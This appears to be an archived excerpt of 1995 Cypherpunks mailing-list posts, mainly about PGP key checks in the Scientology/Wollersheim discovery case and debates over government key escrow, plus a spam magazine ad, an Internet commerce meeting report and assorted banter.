is prepended to the data. The >constant is used to determine if the key is correct. Since the conventional >encryption runs in CFB mode and there is a full block of random IV at the >beginning of the file, it is extremely unlikely that a key could be found >that would properly decrypt only the first two blocks while leaving the rest >unreadable... > >> If Larry Wollersheim does have the valid key. It would be a simpler >> process to know what fake key to use and work it backwards through >> the MD5 to arrive at an ascii string to produce the fake key. > >Not really. Even if you could find an IDEA key that would produce the >desired output it would be hard to find a passphrase that would produce that >key when hashed. One of the properties of one-way hash functions is that it >is difficult to find a plaintext that produces a given hash. Hence the term >'one-way'.... Even if you did find a passphrase (which, if MD5 is strong, >would require something like 2^64 operations), it would likely be long, have >8-bit chars, and would be impossible to type in. It would be tough to >convince anyone that it was the real passphrase. > > >andrew > There was a hack to pgp ui published a while back that would allow someone decrypting a RSA encrypted file to print out the idea key. Another feature of the hack allowed someone with the idea key to decrypt an RSA PGP encrypted file ignoring the RSA headers and using the IDEA key directly. Using this software should allow the reciever of an RSA PGP encrypted file to allow someone else to decrypt it (by giving them the IDEA key) without exposing the secret key. The IV block check will allow them to check that they are using the correct idea key. From janetdove at infosat.com Sat Sep 9 02:58:51 1995 From: janetdove at infosat.com (Janet Dove) Date: Sat, 9 Sep 95 02:58:51 PDT Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles Message-ID: Hi fellow 'netters, My name is Janet Dove and I recently started using a magazine subscription club in the USA that has a FREE 1 yr. magazine subscription deal with your first paid order- and I have been very pleased with them. They have over 1,500 different USA titles that they can ship to any country on a subscription basis. As for computer magazines from the USA, they more of a selection than I ever knew even existed. They have magazines for most every area of interest in their list of 1,500 titles. Within the USA, for their USA members, they are cheaper than all their competitors and even the publishers themselves. This is their price guarantee. Overseas, on the average, they are generally around one-fourth to one-half of what the newstands overseas charge locally for USA magazines. On some titles they are as little as one-tenth of what the newstands charge. They feel that mgazines should not be a luxury overseas. In the USA, people buy magazines and then toss them after reading them for just a few minutes or hours. They are so cheap in the USA! Well, this company would like to make it the same way for their overseas members. They are also cheaper than all their competitors in the USA and overseas, including the publishers themselves! This is their price guarantee. Around one-half their business comes from overseas, so they are very patient with new members who only speak limited English as a 2nd language. Their prices are so cheap because they deal direct with each publisher and cut-out all the middlemen. They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and juicey) !)...if you completely fill out the form below. It has lists of all the freebies, lists of all the titles they sell, titles broken down by categories and detailed descriptions on nearly 1000 of the titles that they sell. Please do not email me as I am just a happy customer and a *busy* student. I don't have time to even complete my thesis in time, let alone run my part-time software business! Email them directly at: munish at grfn.org *------------cut here-----------------------------------------------* REQUEST FOR MORE INFO: please copy this section only and email to: munish at grfn.org (sorry, but incomplete forms *cannot* be acknowledged) Name: Internet email address: Smail home address: City-State-Zip: Country: Work Tel. #: Work Fax #: Home Tel. #: Home Fax #: Name of USA mags you currently get on the newstand or in the store: Name of USA mags you currently get on a subscription basis, through the mail: Name of USA mags you would like price quotes on when we call you: Catalogue format desired from below 2 choices (list "1" or "2"): (1. 22-part email message; 2. atttached file by email) {{{Note- 22-part email can be received by anyone with any computer. Attached file format may not be for you: it is sent as an uncompressed 400K file formatted in Microsoft World text only format, on a Mac; if you don't use Microsoft Word on a Mac - you will have to know how to convert into a usable text format. We cannot help you with this. If in doubt, we suggest you go with the universally acceptable 22-part email message. You can always manually spend a few minutes pasting the parts into one whole.}}} If you saw this on a newsgroup, which newsgroup did you see it on?: How did you hear about us (name of person who referred you or the area of the internet that you saw us mentioned in): Janet Dove 090895BGV *------------cut here-----------------------------------------------* They guarantee to beat all their competitors' prices. Sometimes they are less than half of the next best deal I have been able to find and other times, just a little cheaper - but I have never found a lower rate yet. They assured me that if I ever do, they will beat it. They have been very helpful and helped me change my address from the USA to Finland and then back again when I moved last month. They are very knowledgeable about addressing mags worldwide. They have a deal where you can get a free 1 yr. sub to a new magazine from a special list of over 300 popular titles published in the USA. They will give you this free 1 yr. sub when you place your first paid order with them to a renewal or new subscription to any of the over 1,500 different popular USA titles they sell. They can arrange delivery to virtually any country and I think they have clients in around 35 or 36 countries now. Outside the USA there is a charge for foreign postage and handling (on both paid and freebie subs) that varies from magazine to magazine. I have found their staff to be very friendly and courteous. They even helped me with an address change when I moved from one country to another. The owner thinks of his service as a "club" and his clients as "members" (even though there is no extra fee to become a member - your first purchase automatically makes you a member) and he is real picky about who he accepts as a new member. When he sets you up as a new member, he himself calls you personally on the phone to explain how he works his deal, or sometimes he has one of his assistants call. He is kind of quirky sometimes - he insists on setting up new members by phone so he can say hi to everyone (I sure wouldn't want to have his phone bills!), but you can place future orders (after your first order) via E-mail. He has some really friendly young ladies working for him, who seem to know just as much as he does about this magazine stuff. If you live overseas, he will even call you there, as long as you are interested, but I think he still makes all his overseas calls on the weekends, I guess cause the long distance rates are cheaper then. He only likes to take new members from referrals from satisfied existing members and he does virtually no advertising. When I got set-up, they had a 2-3 week waiting list for new members to be called back so that they could join up. (Once you are an existing member, they help you immediately when you call. ) I think they are able to get back to prospective new members the same day or within a few days now, as they have increased their staff. I am not sure about this.........but if you email the above form to them, that is the way to get started! They will send you some FREE info. via E-mail (the short version (around 40K) of their catalogue, or if you request it the DELUXE LONG VERSION (around 400K-big and juicey) !)...if you fill out the form near the top of this message. They then send you email that outlines how his club works and the list of free choices that you can choose from, as well as the entire list of what he sells; and then they will give you a quick (3-5 minute) friendly, no-pressure no-obligation call to explain everything to you personally and answer all your questions. Once you get in, you'll love them. I do. For more info, just fill out the form near the top of this message and email it to: munish at grfn.org Sincerely, Janet Dove From mfroomki at umiami.ir.miami.edu Sat Sep 9 07:08:41 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Sat, 9 Sep 95 07:08:41 PDT Subject: Scientology/Wollersheim as test case for key disclosure In-Reply-To: <199509090742.AA15129@ideath.goldenbear.com> Message-ID: On Sat, 9 Sep 1995, Greg Broiles wrote: > > the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why > Wollersheim couldn't comply with the discovery rules by providing > plaintext copies of all relevant information, unless for some reason > the passphrase is itself relevant. > Ah. but if there is no plaintext, the question is whether you comply with the rule by providing the encrypted text rather than plaintext. I would say you have to provide the plaintext in the absence of a legitimate privilege claim, but I don't recall a case to this effect (there is precedent for requiring translation of foreign language documents when the request is covered by an evidence conention; I don't recall if there are any such cases that fall purely under domestic US rules). Anyone have chapter and verse? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (soon to move to its real home): http://www.law.miami.edu/~mfroomki From an116512 at anon.penet.fi Sat Sep 9 10:09:11 1995 From: an116512 at anon.penet.fi (an116512 at anon.penet.fi) Date: Sat, 9 Sep 95 10:09:11 PDT Subject: not a flame please read and think about this Message-ID: <9509091640.AA15487@anon.penet.fi> to make my point: why is pat farrel helping the nsa and nist make better key escrow? i quote mr farrel: We reworded #5 to say "want to Trust the Product." This means that it is untampered, works as expected, etc. We then hashed out ways to know this. The list ended up looking like: 1. is available only as object code 2. contains some "hash" function to check for modifications 3. contains some unique hash, with uniqueness based upon something like "site," "per copy" or "per release" 4. Contains policies against modification, such as liscense language against decompilation. 5. OS-related security, such as runs "protected mode" instead of as a wild DOS program. and We then developed "goals" including: 1. One version for sale worldwide 2. Allow development in the US 3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-) 4. Must interoperate with everything 5. Receiver can only decrypt if escrow agencies can decrypt. hey why not just write the escorw code for them!!!??? is mr farrel just being naive or is does he realize who hes working for? sorry to single him out but this is just an example of what im talking about. he is not the only example by far. think people!!!!! ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From kelso at netcom.com Sat Sep 9 10:10:55 1995 From: kelso at netcom.com (Tom Rollins) Date: Sat, 9 Sep 95 10:10:55 PDT Subject: Scientology tries to break PGP - and fails? (fwd) Message-ID: <199509091707.KAA15642@netcom17.netcom.com> > >Tom Rollins writes: > >> If this is the file that the Co$ is trying to crack, then what the > >> is being asked for is a pass phrase that can be handed to the Co$ > >> that will pass the PGP valid key check and still not decrypt the > >> data to anything usefull. > > > >Well, I don't have the PGP 'conventional' encryption format memorized, but > >there is probably a constant after the IV that is prepended to the data. The > >constant is used to determine if the key is correct. Since the conventional > >encryption runs in CFB mode and there is a full block of random IV at the > >beginning of the file, it is extremely unlikely that a key could be found > >that would properly decrypt only the first two blocks while leaving the rest > >unreadable... > > > >> If Larry Wollersheim does have the valid key. It would be a simpler > >> process to know what fake key to use and work it backwards through > >> the MD5 to arrive at an ascii string to produce the fake key. > > > >Not really. Even if you could find an IDEA key that would produce the > >desired output it would be hard to find a passphrase that would produce that > >key when hashed. One of the properties of one-way hash functions is that it > >is difficult to find a plaintext that produces a given hash. Hence the term > >'one-way'.... Even if you did find a passphrase (which, if MD5 is strong, > >would require something like 2^64 operations), it would likely be long, have > >8-bit chars, and would be impossible to type in. It would be tough to > >convince anyone that it was the real passphrase. > > > > > >andrew > > > > > There was a hack to pgp ui published a while back that would allow > someone decrypting a RSA encrypted file to print out the idea key. > > Another feature of the hack allowed someone with the idea key to decrypt > an RSA PGP encrypted file ignoring the RSA headers and using the IDEA > key directly. > > Using this software should allow the reciever of an RSA PGP encrypted > file to allow someone else to decrypt it (by giving them the IDEA key) > without exposing the secret key. The IV block check will allow them to > check that they are using the correct idea key. > Looking at the source code showes that all that is needed to pass the PGP key check is for the first two blocks to decode in such a way that the last 2 bytes of the IV match the 2 check bytes before the actual message. Thus the first 6 bytes of the IV and the last 6 bytes of the next block need not match the actual message. There was a bug in the older versions of PGP that set the IV to a constant instead of a random value when encrypting with the "-c" option. I made a mistake thinking that knowledge of the correct key would help in creating a fake key. From roy at cybrspc.mn.org Sat Sep 9 11:00:49 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Sat, 9 Sep 95 11:00:49 PDT Subject: 9K P6 In-Reply-To: <199509082135.RAA26681@pipe2.nyc.pipeline.com> Message-ID: <950909.114931.1m4.rnr.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, jya at pipeline.com quotes an Intel press release: > Today, by making it possible to ensure the safety, reliability, > and performance of the weapons stockpile while foregoing nuclear > testing, the Intel/Sandia teraflop computer can help the world take > a further step back from the shadows of war into the light of peace. Intel's PR department has a great future doing Gummint work. This is a stellar example of Doublespeak. Kinda makes me nauseous. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at cybrspc.mn.org -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFHGOBvikii9febJAQHd/QQAuGxuIEZDrAryaxcvANnpiHNJjVRcJT+D YPjKdVdAPy/FN1fDLEkQeyJUPgzojDSsyyZnODIobT8uLBA36znodrlFYKBzFyxA jpNYC4ef7DZU+Mm0NkoZN+3UY+GwaLc7Utfkg5eSj0e9awnbQ6+l56scwmCWZtF1 G+eOzU/i5wA= =9giO -----END PGP SIGNATURE----- From hallam at w3.org Sat Sep 9 11:43:35 1995 From: hallam at w3.org (hallam at w3.org) Date: Sat, 9 Sep 95 11:43:35 PDT Subject: Scientology/Wollersheim as test case for key disclosure In-Reply-To: Message-ID: <9509091842.AA13158@zorch.w3.org> One solution to this problem would be to modify PGP so that the session key for the document was released rather than the passphrase for the public key. The former would provide only read access, the latter would allow th scientologists to forge Wollerstein's signature on other material. In addition many of the documents may be subject to privillege. I would have thought that there would be grounds to oppose the court action in any case on various grounds, not least the previous judgement which the Scientologists lost and have failed to pay the damages awarded. There might also be grounds to oppose disclosure if the case was brought in order to obtain secret material rather than for legitimate purposes. In the UK the judge can be asked to review documents and decide whether they should be made avaliable. Surely the disclosure laws would work in wollerstein's favour in any case. He can request disclosure of internal Scientology material. Phill From pfarrell at netcom.com Sat Sep 9 11:59:27 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sat, 9 Sep 95 11:59:27 PDT Subject: Sigh Re: not a flame please read and think about this Message-ID: <53877.pfarrell@netcom.com> Subject line is bull*&^&, IMHO, of course In message Sat, 9 Sep 1995 16:40:00 UTC, an116512 at anon.penet.fi writes: > to make my point: why is pat farrel helping the nsa and nist make Learn to spell my name. It is on my .sig, my keys, and in my userid. We blockheaded, Irish Catholic Americans are damn proud of our name. Farrell's (along with other cheap Irish labor) built the railroads from Chicago west. Please spell it correctly, even if you are flaming me. > hey why not just write the escorw code for them!!!??? > is mr farrel just being naive or is does he realize who hes working for? > sorry to single him out but this is just an example of what im talking > about. I doubt that this clown deserves a response, but... There were a number of cypherpunks there. I can't speak for all, but I expect movites include: - attempting to clarify vague and confusing wording so we could understand what they wanted. - seeing that working with them, rather than yelling at their stupidity, has a higher chance of getting results. - we got to meet influential folks from industry who agree with us. - some of us aren't completely apposed to CKE. I think it has value. If we could convert their plan for GAK into CKE, it would be a big win, well worth the effort. - they are going to promulgate a FIPS PUB standard next week, whether I like it or not, and whether I help or not. It is better to have that standard understandable and clear than fuzzy and subject to subective evaluation. - getting preposterous misstatements into the formal Federal Register so we can quote it back to them in the congressional hearings. Mr Geoff Greivelddinger's words should be handy to quote, for one example. - there are lots more, but I doubt that I can convince this clown. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From usura at utopia.hacktic.nl Sat Sep 9 12:20:17 1995 From: usura at utopia.hacktic.nl (uSuRa) Date: Sat, 9 Sep 95 12:20:17 PDT Subject: WoT keyring (fwd) Message-ID: <199509091919.VAA00549@utopia.hacktic.nl> Forwarded message: > From: don at stat8.byu.edu (Donald M. Kitchen) > > Due to problems distributing my Web of Trust keyring from my own site, > I have uploaded a .gz version. Please announce it to cpunks as soon > as you have changed the permissions. > > Thanks > Don This file is available from: ftp.hacktic.nl/pub/pgp/pgp-key-ring/donring.pgp.gz 944 -rw-r--r-- 1 pub pub 955577 Sep 8 18:37 donring.pgp.gz EnJoY ! -AJ- From sharborth at hai-net.com Sat Sep 9 12:21:44 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Sat, 9 Sep 95 12:21:44 PDT Subject: [NOISE/Fun] some 'special' primes Message-ID: <9508098106.AA810686211@houston_cc_smtp.hai-net.com> No, it's ocht hundert elf Skip ______________________________ Reply Separator _________________________________ Subject: Re: [NOISE/Fun] some 'special' primes Author: Michael at internet Date: 09-09-95 00:34 > A bit more fun : German : 811 (dunno how to write it, but it starts > with an "a") acht hundert uenf (I think) --Michael From usura at utopia.hacktic.nl Sat Sep 9 12:24:38 1995 From: usura at utopia.hacktic.nl (uSuRa) Date: Sat, 9 Sep 95 12:24:38 PDT Subject: WoT keyring In-Reply-To: <9409091627.AA05472@stat8.byu.edu> Message-ID: <199509091923.VAA00663@utopia.hacktic.nl> >From Donald M. Kitchen: > > Due to problems distributing my Web of Trust keyring from my own site, > I have uploaded a .gz version. Please announce it to cpunks as soon > as you have changed the permissions. > > Thanks > > Don > It's available from: ftp.hacktic.nl/pub/pgp/pgp-key-ring total 946 1 drwxr-xr-x 2 pub pub 512 Sep 9 21:15 ./ 1 drwxr-xr-x 4 pub pub 512 Sep 9 21:14 ../ 944 -rw-r--r-- 1 pub pub 955577 Sep 9 21:15 donring.pgp.gz Regards, -AJ- From mike at uac.net Sat Sep 9 12:24:45 1995 From: mike at uac.net (Michael) Date: Sat, 9 Sep 95 12:24:45 PDT Subject: [NOISE/Fun] some 'special' primes In-Reply-To: <9508098106.AA810686211@houston_cc_smtp.hai-net.com> Message-ID: <199509091924.PAA26191@mail1.uac.net> > ocht hundert elf How about a compromise... acht hundert elf --Michael From sharborth at hai-net.com Sat Sep 9 12:31:10 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Sat, 9 Sep 95 12:31:10 PDT Subject: [NOISE/Fun] some 'special' primes Message-ID: <9508098106.AA810686811@houston_cc_smtp.hai-net.com> yah |> ocht hundert elf | |How about a compromise... | | acht hundert elf | | |--Michael From pfarrell at netcom.com Sat Sep 9 12:37:44 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sat, 9 Sep 95 12:37:44 PDT Subject: DC-area Meeting Sept 16 Message-ID: <56183.pfarrell@netcom.com> The next DC-area cypherpunks meeting will be next Saturday afternoon at Digex's headquarters in suburban Maryland. Please mark your calendars. Directions, maps, and exact time will be published soon. Doug Humphrey says that the office is less than one mile from public transportation. Carpools worked for the last meeting, so I expect rides from Northern Virginia and even Baltimore can be arrainged. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From alano at teleport.com Sat Sep 9 12:41:21 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 9 Sep 95 12:41:21 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509091941.MAA04904@desiree.teleport.com> At 02:44 PM 9/8/95 -0400, you wrote: >We wish! We really wish! "Fill that lawyer with a few more slugs of encryption!" The argument that encryption will free us from all the legal ills of the world is pretty specious. If anything it will make more work for lawyers as the non-clue-endowed portion of the world tries to come to terms with the new technology. They will make rules and subsets of rules and exeptions to rules and variations to interpetations of rules that will make the current set look like the rules to "chutes and ladders". Part of the job of the lawyer class is to guarentee the existance of work for other lawyers (as well as themselves). It does not depend on what the medium of exchange is. Lawyers and government forces will try and figure out some way to try and extract it from you. The government is trying very hard to keep any scrap of power from creeping away from them. You can bet that they will try every thing they can think of, rational and irrational, to regulate and control the wilds of cyberspace. They will pump up every imaginary boogieman to help them get the public to swallow what they are fed. By the time they figure out they have been had, it will be too late. Cypherpunks must be the syrup of ipecac to the governments dose of poison to the body politic! (I need to start drinking more coffee in the morning. I cannot believe I wrote that...) Unfortunatly the public does not thrive on logic. They had been trained to react emotionally to things and not react logically. I am not certain what can be used to get them to realize why they need encryption. Dispelling the bogeymen is none need. The other thing is that the tools need to be made as simple as possible. The current tools for use require a fair bit of technical understanding. Until they have an integrated front-end that makes it about as easy to use as America On-Line, encryption will not gain widespread usage. This is the type of code that needs to be written. Making integrated tools like newsreaders and mail programs that support strong encryption directly is what is needed for widespread use. (As well as being usable programs in and of themselves. Many of the programs for news and mail are crap.) Making cryptography a "cool and fun thing to use" will help dispell many of the myths and may help to defuse the government created bogey men. (Of course they will claim that it aids "criminals and terrorists", but to them EVERYONE is a criminal and a terrorist.) | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From goedel at tezcat.com Sat Sep 9 12:50:58 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Sat, 9 Sep 95 12:50:58 PDT Subject: [NOISE/Fun] some 'special' primes Message-ID: > No, it's > > ocht hundert elf > > Skip > acht, not ocht. DJK From vznuri at netcom.com Sat Sep 9 13:03:58 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sat, 9 Sep 95 13:03:58 PDT Subject: Internet commerce mtg, Denver Message-ID: <199509092000.NAA14106@netcom19.netcom.com> I went to an Internet commerce convention meeting in Denver last week, and thought some here would be interested in some of the topics and companies. the most important company I saw at the meeting is called "YellowNet". I knew this would happen someday, but this company is attempting to build up a *world wide* online business directory accessable over the web. they are trying to build up the infrastructure to handle up to 1M hits per day. a rep told me they were going to go all out in a publicity blitzkrieg at the beginning of Oct. , but for now they are getting ready for prime time. its currently a private company but I suspect they may go public in a year or two. the rep told me something interesting: he said that every Bell phone book is actually "seeded" with dummy names so they can detect copyright infringers. if you come out with a business directory, these Bells will just scan for the fake names that they have inserted into their own listings. if they find them, supposedly they can show them to a copyright judge and he will immediately close down your operation and fine you, almost no questions asked. I didn't know how much of this really happens (the legal stuff sounded questionable to me) but it is an interesting "real world" instance of copyright terrorism prevention that the "information liberation front" would have to contend with. the rep told me that they were willing to go to "phillipine calling houses" that do nothing but contract out to companies, and have the laborers dial the long lists of phone numbers to verify them. as I understand it they exist and supposedly the long distance is so cheap now that they are actually profitable being run out of the phillipines or wherever. he said his company was about to do this when they found a national CD directory of businesses, and they were grudgingly willing to license the CD informtion for the web pages. anyway, cpunks, you may be interested in getting into the ground floor of something like this. the yellow pages are an *extremely* lucrative source of income for phone companies and if they don't compete over the web, I think they are going to become increasingly obsolete-- esp. when the Web becomes accessable to the home more readily through e.g. cable companies. the URL: http://www.yellownet.com what I am suspecting however is that these kinds of services are going to be common, and it will not be that difficult to get your *pointer* into them for free. as far as them offering advertisements, though, I can't see how they could charge much more than a standard web site service charge for some pages. in other words, the days of hundreds of dollars for a display ad are probably not going to happen on the web, IMHO. and I don't see how they could charge for mere pointers at all, given that the competition will probably give them away. -- the other major companies at the show were generally large and small internet providers, and a lot of web page consulting firms (large and small). various network connection providers & consultants, etc. another thing I would like to clue everyone in on, if it isn't already obvious: the Web is going to go crazy as companies realize they can have dynamic forms to serve customers without any clerks required. this is going to be a *very* hot area of development over the next few years IMHO. it is really not that big of deal to have an inert "online brochure" but the technical capability required to do programming behind forms to interface with company databases is not trivial, and I think this is going to become an extremely hot occupation over the next few years. in other words, programmers who can customize web sites to interface to the existing company's databases and computer infrastructure will be very valuable. this is called "CGI"; many of you are probably already experts in it. (if you are, I'd like to talk to you about an application I'm trying to write...) examples of this are infinite, but a few: a customer could query the company inventory, find what stores are nearest to his home, find what store has what he wants in stock immediately, check on special prices and discounts of the moment, etc. he might be able to put himself on a company mailing list, etc. so far I have not seen this very widespread, these customized web applications, but I think they are really going to proliferate massively. I have also been seeing a lot of excitement over Java, and I think this really has the potential to become a "net standard binary interchange format". however I think the day when the Java apps are proliferating all over the net will be quite awhile away (6 mos or more at least) and that businesses are still probably going to want to use the more prosaic form interfaces for compatility and simplicity. Java is really starting out right, in that it begins as day 1 as a total free, open standard. Sun and Netscape are not claiming burdensome proprietary rights to it. this makes it amazingly attractive. the market has shown repeatedly that it will often go with an inferior open standard in preference to a technologically superior closed one. (and IMHO with good reason.. the market is pretty rational, just not in ways technophiles necessarily expect). another thing I saw that Sun is promoting: they now have Web authoring applications that require almost no HTML expertise whatsoever. you can drag and drop pictures where you want them in the documents etc. I suspect this may become the preferred way to work on web documents in the future to the point that people who actually memorize all the HTML commands may be in the minority. this actually argues in favor of a HTML that is not necessarily that pretty or syntactically consistent (of course, both aspects have already been pretty much lost in the mad rush to add new features anyway). -- another thing I'd like to point out is that there are a lot of hackers here with specialized knowledge into the web and perl and other tools, and in our culture (the cypherpunk list, e.g.) these things are considered pretty simple, mundane, and obvious, but there is an enormous business culture out there with a lot of money and not very many clues about this technology. the consulting opportunities for "small fries" are becoming very attractive and widespread. it is easy for us to say, "oh, that's no big deal, why would anyone pay money for that??" but in fact what is happening is that people are paying *big* money for simple things like HTML expertise. there were a total of about 50 classes at this show, and you'd be really surprised how many were on fairly basic subjects like "what is the internet? what is the web? what can it do for me?" etc. however many of these classes focused on secure banking transactions. and cryptographic expertise will probably move to the forefront of job requirements in about a year for these kinds of jobs, I would imagine. they will probably tend to emphasize the need for background in security related applications. right now there are a lot of toy, insecure applications but it is only a matter of time before people realize that if you really want to get serious, you have to have cryptography tied in and sharp people to plug all possible security holes, and you don't want stuff made out of "bubblegum and baling wire". so it appears that cypherpunks are really positioned on the crest of a tidal wave!! any of "us" who have been on the list in the pre-web era are beginning to feel like old fogeys from the prehistoric era!! it seems that cyberspace for the elite was born with the Internet, but "cyberspace for the unwashed masses" was born with the Web. --Vlad Nuri From anonymous-remailer at shell.portal.com Sat Sep 9 13:07:51 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 9 Sep 95 13:07:51 PDT Subject: Sigh Re: not a flame please read and think about this Message-ID: <199509092006.NAA05181@jobe.shell.portal.com> Pat F A R R E L L wrote: / Subject line is bull*&^&, IMHO, of course Hey everyone has an opinion. In message Sat, 9 Sep 1995 16:40:00 UTC, an116512 at anon.penet.fi writes: > to make my point: why is pat farrel helping the nsa and nist make /Learn to spell my name. It is on my .sig, my keys, and in my userid. /We blockheaded, Irish Catholic Americans are damn proud of our name. /Farrell's (along with other cheap Irish labor) built the railroads /from Chicago west. Please spell it correctly, even if you are flaming me. F A R R E L L M O U S E > hey why not just write the escorw code for them!!!??? > is mr farrel just being naive or is does he realize who hes working for? > sorry to single him out but this is just an example of what im talking > about. /I doubt that this clown deserves a response, but... Then shut up. /There were a number of cypherpunks there. I can't speak for all, /but I expect movites include: /- attempting to clarify vague and confusing wording so we could /understand what they wanted. 'k /- seeing that working with them, rather than yelling at their stupidity, /has a higher chance of getting results. Beware of compromise, you become the rag puller for the rapist. / - we got to meet influential folks from industry who agree with us. 'k /- some of us aren't completely apposed to CKE. I think it has value. /If we could convert their plan for GAK into CKE, it would be a big win, /well worth the effort. Yea right. / - they are going to promulgate a FIPS PUB standard next week, whether I /like it or not, and whether I help or not. It is better to have that /standard understandable and clear than fuzzy and subject to subective /evaluation. Clear as any government forced standard can be. / - getting preposterous misstatements into the formal Federal Register so / we can quote it back to them in the congressional hearings. Mr Geoff / Greivelddinger's words should be handy to quote, for one example. 'k /- there are lots more, but I doubt that I can convince this clown. Then shut up. From cme at acm.org Sat Sep 9 13:22:53 1995 From: cme at acm.org (cme at acm.org) Date: Sat, 9 Sep 95 13:22:53 PDT Subject: GAK In-Reply-To: Message-ID: <9509092013.AA02155@tis.com> >Date: Fri, 8 Sep 1995 17:58:57 -0800 >From: cman at communities.com (Douglas Barnes) > > >> >>If too much attractive stuff is available by loss of any one public key, >>that key gets attacked. To compensate for this, the TIS DRC generates new >>public keys periodically to give out to new (or old) customers. >> >>However, a government warrant which demands the DRC's private key collection >>would gain quite a harvest. > >The economics of the situation seem to dictate that whether you have >one key or N keys, it's going to be cheaper to subvert the escrow agent >(you guys or whoever) than it is to brute-force even one key. You're right, of course. That's why I, personally, would trust my key backup only to (k of n) TIS DRCs in Earth orbit or farther out. >You may feel very comfortable with the personnel and procedures you >have in place now, .... People keep assuming that TIS will run a commercial DRC. We do not plan to. We did the design and will sell DRC hardware and security consulting (physical, policy, ...) to companies wanting to set up their own for internal use. That's the only mass DRC market we envision. This could change, but that's the current plan. Meanwhile, the real question is GAK -- whether the DRC you choose to use goes along with it or not. You might check my home page for my views on GAK. It is possible to have a Corporation running a DRC which refuses to play along with GAK. They won't be blessed for attachment to exportable crypto, most likely, but it's entirely possible for this to exist. Tim May may run one, for example. (I'd still want it to be in orbit.) - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From zinc at zifi.genetics.utah.edu Sat Sep 9 13:52:23 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Sat, 9 Sep 95 13:52:23 PDT Subject: Sigh Re: not a flame please read and think about this In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- well well well, our anon friend flames away with 'shut up' 'shut up' 'shut up'. aint free speech nice. it's so nice to see the remailers put to such good use! if you are going to post flames and worthless commentary the least you could do is sign the mesg so we can killfile you. mr. anon, perhaps you've noticed that the govt pretty much does what they want. in this instance we have the chance to have some influence (albeit minor) on what the outcome is. or, perhaps you're just some TLA stooge sent to disrupt our plans to take over the world. i suppose you think we should just tell the govt to 'shut up'. yup, that will do the trick. they'll just say, 'gee, sure. sorry we tried to take away your privacy. our fault.' right. the govt would prefer a nice docile populace that goes to work and pays their taxes without talking back. in any event, this isn't the first grade. we don't tell people to 'shut up'. - -pat, another irish, but ex-catholic, ridiculously cheap labor involving biochemistry patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFH+Y03Qo/lG0AH5AQFncAP/dtUG1rhbbqDDo5fSQfK85e1YrlUWdq7w fK5v5baDXfKkZG3+O3oxgiggcQo+uFB+EXc7KP2LSpSbUf4GCF1bZj84OaNk7bZY RqsUSQ6PMUgAbrLynW5fjlSlkGCsRb1m0OOmNAu31K2bv3cfVSlq6ZHdXFcM3j5G 5UtqwoMW17A= =5CTQ -----END PGP SIGNATURE----- From don at cs.byu.edu Sat Sep 9 14:00:04 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Sat, 9 Sep 95 14:00:04 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: <199509092058.OAA21485@bert.cs.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- >hack..print out the idea key. >using the IDEA key directly. This would be a neat addition to PGP. It would be fun to take random data and slap PGP headers on it, and maybe throw in a real encryption that doesn't report the true IDEA key. It would be a valuable trick for StealthPGP / stego systems, if we ever need it. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMFGJicLa+QKZS485AQH9vgMAwnofHnb7EOpcWVtCp9lWdySM2W7wAnQ5 